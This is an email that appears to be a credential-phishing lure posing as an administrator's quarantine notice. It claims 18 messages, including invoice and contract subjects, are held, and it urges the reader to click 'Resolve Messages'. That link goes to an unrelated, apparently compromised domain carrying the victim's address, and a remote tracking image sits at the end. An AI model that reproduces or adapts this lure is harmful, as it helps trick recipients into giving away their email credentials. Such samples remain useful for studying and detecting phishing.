Subject: Notice: You 18 Incoming Failed Messages
From: <[email-masked]>
To: <[email-masked]>
Date: Thu, 12 Sep 2024 11:35:55 +0330

Incoming Failed Messages

 	

The following messages has been blocked by your administrator due to
validation error.	

You have 18 new messages in your email quarantine.
User:  [email-masked] 	

Click on Resolve Messages (18), to move these message(s) to your inbox
folder:	

                                                      Quarantined email	
Status	 Recipient:	 Subject:	 Date:	
Pending	 [email-masked]	Re: FREIGHT INVOICE	 02:07 	
Pending	 [email-masked]	 FW: provisional invoice	 02:37 	
Pending	 [email-masked]	 Re: Gasoline Contract Signed	09/11/2024

Pending  	 [email-masked]	 RE: Draft Documents
09/12/2024	

 	

RESOLVE MESSAGES (18)
<https://espaceo.ca/.well-known/acme-challenge/challenge/acme-users/?email
=[email-masked]> 	

Note: This message was sent by the system for notification only. Please do
not reply

If this message lands in your spam folder, please move it to your inbox
folder for proper integration.

This Email is was sent to  [email-masked]	

 
<https://ovhltd.co.uk:2096/cpsess8221080269/3rdparty/roundcube/program/res
ources/blocked.gif>